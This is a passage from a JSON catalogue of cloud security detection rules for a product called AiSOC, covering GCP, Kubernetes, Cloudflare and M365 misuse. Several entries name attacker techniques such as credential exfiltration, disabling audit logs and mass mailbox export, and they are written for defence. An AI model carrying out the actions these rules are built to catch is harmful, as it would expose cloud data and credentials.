"detections/cloud/gcp-iam-service-account-key-mass-create.yaml" }, { "id": "det-cloud-143", "type": "detection", "name": "GCP IAM Binding To External Domain", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Binding To External Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-grant-from-foreign-domain.yaml" }, { "id": "det-cloud-144", "type": "detection", "name": "GCP Service Account Impersonation Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Impersonation Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-impersonation-burst.yaml" }, { "id": "det-cloud-145", "type": "detection", "name": "GCP IAM Conditional Binding Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Conditional Binding Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-conditional-binding-removed.yaml" }, { "id": "det-cloud-146", "type": "detection", "name": "GCS Bucket IAM Granted To allUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket IAM Granted To allUsers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-iam-allusers.yaml" }, { "id": "det-cloud-147", "type": "detection", "name": "GCS Uniform Bucket-Level Access Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Uniform Bucket-Level Access Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-uniform-access-disabled.yaml" }, { "id": "det-cloud-148", "type": "detection", "name": "GCS Mass Object Delete Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Mass Object Delete Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-mass-delete.yaml" }, { "id": "det-cloud-149", "type": "detection", "name": "GCS Bucket Retention Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket Retention Policy Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-retention-removed.yaml" }, { "id": "det-cloud-150", "type": "detection", "name": "GCS Object Versioning Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Object Versioning Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1490" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-versioning-disabled.yaml" }, { "id": "det-cloud-151", "type": "detection", "name": "GCS Bucket CORS Wildcard Origin", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCS Bucket CORS Wildcard Origin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-cors-wildcard.yaml" }, { "id": "det-cloud-152", "type": "detection", "name": "GKE Cluster Anonymous Auth Enabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Cluster Anonymous Auth Enabled'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-rbac-anonymous.yaml" }, { "id": "det-cloud-153", "type": "detection", "name": "GKE Cluster Private Cluster Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Cluster Private Cluster Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-private-cluster-disabled.yaml" }, { "id": "det-cloud-154", "type": "detection", "name": "GKE Workload Identity Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Workload Identity Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-workload-identity-disabled.yaml" }, { "id": "det-cloud-155", "type": "detection", "name": "GKE Shielded Nodes Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Shielded Nodes Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-shielded-nodes-disabled.yaml" }, { "id": "det-cloud-156", "type": "detection", "name": "GKE Binary Authorization Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GKE Binary Authorization Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gke-binary-auth-disabled.yaml" }, { "id": "det-cloud-157", "type": "detection", "name": "BigQuery Dataset ACL Adds allUsers", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Dataset ACL Adds allUsers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-dataset-allusers-access.yaml" }, { "id": "det-cloud-158", "type": "detection", "name": "BigQuery Mass Export Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Mass Export Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567.002" ], "log_source": "gcp", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-mass-export.yaml" }, { "id": "det-cloud-159", "type": "detection", "name": "BigQuery Query Across External Project", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Query Across External Project'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1083" ], "log_source": "gcp", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-cross-project-query.yaml" }, { "id": "det-cloud-160", "type": "detection", "name": "BigQuery Table Deleted Within 1 Hour Of Creation", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Table Deleted Within 1 Hour Of Creation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-table-deleted-recently-created.yaml" }, { "id": "det-cloud-161", "type": "detection", "name": "BigQuery Dataset CMEK Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'BigQuery Dataset CMEK Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bq-cmek-removed.yaml" }, { "id": "det-cloud-162", "type": "detection", "name": "GCP Firewall Rule 0.0.0.0/0 With Any Port", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Firewall Rule 0.0.0.0/0 With Any Port'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-firewall-source-any-port-any.yaml" }, { "id": "det-cloud-163", "type": "detection", "name": "GCP Compute Public IP Attached To Instance", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Compute Public IP Attached To Instance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "gcp", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-instance-public-ip-attached.yaml" }, { "id": "det-cloud-164", "type": "detection", "name": "GCP Project OS Login Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Project OS Login Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-os-login-disabled.yaml" }, { "id": "det-cloud-165", "type": "detection", "name": "GCP Compute Shielded VM Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Compute Shielded VM Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-compute-shielded-vm-disabled.yaml" }, { "id": "det-cloud-166", "type": "detection", "name": "Kubernetes cluster-admin ClusterRoleBinding For Non-System Subject", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes cluster-admin ClusterRoleBinding For Non-System Subject'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-cluster-admin-binding-non-system.yaml" }, { "id": "det-cloud-167", "type": "detection", "name": "Kubernetes Secret Mass Get", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Secret Mass Get'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-secret-mass-get.yaml" }, { "id": "det-cloud-168", "type": "detection", "name": "Kubernetes pods/exec In Production Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes pods/exec In Production Namespace'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "kubernetes", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-exec-prod-namespace.yaml" }, { "id": "det-cloud-169", "type": "detection", "name": "Kubernetes pods/attach In Production Namespace", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes pods/attach In Production Namespace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "kubernetes", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-attach-prod-namespace.yaml" }, { "id": "det-cloud-170", "type": "detection", "name": "Kubernetes Request By system:anonymous", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Request By system:anonymous'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-anonymous-system-unauth.yaml" }, { "id": "det-cloud-171", "type": "detection", "name": "Kubernetes Role Created With Wildcard Verb", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Role Created With Wildcard Verb'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-rbac-wildcard-verb.yaml" }, { "id": "det-cloud-172", "type": "detection", "name": "Kubernetes Pod hostPID=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod hostPID=true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-host-pid-enabled.yaml" }, { "id": "det-cloud-173", "type": "detection", "name": "Kubernetes Pod hostNetwork=true", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod hostNetwork=true'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-host-network-enabled.yaml" }, { "id": "det-cloud-174", "type": "detection", "name": "Kubernetes Privileged Container Created", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Privileged Container Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-pod-privileged-container.yaml" }, { "id": "det-cloud-175", "type": "detection", "name": "Kubernetes ValidatingWebhookConfiguration Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes ValidatingWebhookConfiguration Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-validating-webhook-deleted.yaml" }, { "id": "det-cloud-176", "type": "detection", "name": "Kubernetes MutatingWebhookConfiguration With External Endpoint", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes MutatingWebhookConfiguration With External Endpoint'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-mutating-webhook-suspicious-target.yaml" }, { "id": "det-cloud-177", "type": "detection", "name": "Kubernetes Pod Default ServiceAccount Token Mount", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Pod Default ServiceAccount Token Mount'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1078" ], "log_source": "kubernetes", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-service-account-token-mount-default.yaml" }, { "id": "det-cloud-178", "type": "detection", "name": "Kubernetes Impersonate Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Impersonate Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.001" ], "log_source": "kubernetes", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-impersonation-by-user.yaml" }, { "id": "det-cloud-179", "type": "detection", "name": "Kubernetes Production Namespace Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes Production Namespace Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "kubernetes", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-namespace-deletion-prod.yaml" }, { "id": "det-cloud-180", "type": "detection", "name": "Kubernetes NetworkPolicy Deleted In Production", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Kubernetes NetworkPolicy Deleted In Production'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.004" ], "log_source": "kubernetes", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/k8s-network-policy-deleted-prod.yaml" }, { "id": "det-cloud-181", "type": "detection", "name": "Cloudflare Zone Transferred Out Of Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare Zone Transferred Out Of Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1583.001" ], "log_source": "cloudflare", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-zone-transfer.yaml" }, { "id": "det-cloud-182", "type": "detection", "name": "Cloudflare WAF Rule Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare WAF Rule Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "cloudflare", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-waf-rule-disabled.yaml" }, { "id": "det-cloud-183", "type": "detection", "name": "Cloudflare Access Policy Bypass Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloudflare Access Policy Bypass Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "cloudflare", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cloudflare-access-policy-bypass.yaml" }, { "id": "det-cloud-184", "type": "detection", "name": "DigitalOcean Droplet Snapshot Transferred", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'DigitalOcean Droplet Snapshot Transferred'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "digitalocean", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-do-droplet-snapshot-shared.yaml" }, { "id": "det-cloud-185", "type": "detection", "name": "OCI Tenant Administrators Group Membership Added", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'OCI Tenant Administrators Group Membership Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "oci", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-oci-iam-tenant-admin-binding.yaml" }, { "id": "det-cloud-186", "type": "detection", "name": "Multi-Cloud Cross-Cloud Mass Egress Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Multi-Cloud Cross-Cloud Mass Egress Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1567" ], "log_source": "multi-cloud", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-multi-cross-cloud-mass-egress.yaml" }, { "id": "det-cloud-187", "type": "detection", "name": "Infra-As-Code Drift Bypassed With Manual Override", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Infra-As-Code Drift Bypassed With Manual Override'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1610" ], "log_source": "multi-cloud", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-iac-drift-bypassed.yaml" }, { "id": "det-cloud-188", "type": "detection", "name": "Terraform State File Modified Outside Pipeline", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Terraform State File Modified Outside Pipeline'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1565.001" ], "log_source": "multi-cloud", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-terraform-state-modified-direct.yaml" }, { "id": "det-cloud-189", "type": "detection", "name": "Cloud Provider SAML IdP Trust Changed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Provider SAML IdP Trust Changed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "multi-cloud", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-saml-idp-trust-changed.yaml" }, { "id": "det-cloud-190", "type": "detection", "name": "Cloud Provider Root/Owner Email Modified", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Provider Root/Owner Email Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "multi-cloud", "playbook": "tpl-account-manipulation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-org-rootmail-modified.yaml" }, { "id": "det-cloud-191", "type": "detection", "name": "AWS GuardDuty \u2014 UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration", "description": "Detects GuardDuty HIGH-severity finding that EC2 instance credentials (obtained via the IMDS) were used from an IP address outside of AWS \u2014 a strong signal of instance metadata theft and subsequent exfiltration of the temporary credentials to an attacker-controlled host. GuardDuty generates this when the calling IP is publicly routable and does not belong to the originating EC2 instance's region.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1552.005", "T1078.004", "T1071.001" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-guardduty-instance-credential-exfiltration.yaml" }, { "id": "det-cloud-192", "type": "detection", "name": "M365 Exchange Transport Rule Redirects Mail Externally", "description": "Detects creation or modification of an Exchange Online transport rule that redirects or forwards mail to an external domain. Commonly abused in BEC attacks to silently siphon conversations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.003", "T1020" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-transport-rule-external-redirect.yaml" }, { "id": "det-cloud-193", "type": "detection", "name": "M365 Exchange Mailbox Audit Bypass Enabled", "description": "AuditBypassEnabled was set to True on a mailbox, suppressing all audit logging for that account. Threat actors use this to operate invisibly in a compromised mailbox.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-audit-bypass-enabled.yaml" }, { "id": "det-cloud-194", "type": "detection", "name": "M365 eDiscovery Compliance Search Across All Mailboxes", "description": "A compliance search targeting all mailboxes was created via eDiscovery or Purview. This is a common precursor to mass email exfiltration via New-ComplianceSearchAction -Export.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1530" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-search-all-mailboxes.yaml" }, { "id": "det-cloud-195", "type": "detection", "name": "M365 eDiscovery Search Results Exported", "description": "Results from a compliance search were exported. When paired with a broad compliance search this represents confirmed data exfiltration through M365 native tooling.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1114.002", "T1567" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-exchange-ediscovery-export.yaml" }, { "id": "det-cloud-196", "type": "detection", "name": "M365 SharePoint External Sharing Enabled at Org Level", "description": "SharePoint Online tenant sharing capability was changed to allow sharing with anonymous or new external users. This broadens the blast radius of any future data exposure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1537", "T1213.002" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-external-sharing-enabled-org.yaml" }, { "id": "det-cloud-197", "type": "detection", "name": "M365 SharePoint Site Collection Admin Granted to External User", "description": "Detects an external (guest) user being granted site collection administrator rights on a SharePoint Online site. External admins can access all site content and modify permissions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "m365", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/m365-sharepoint-site-admin-external-user.yaml" }, { "id": 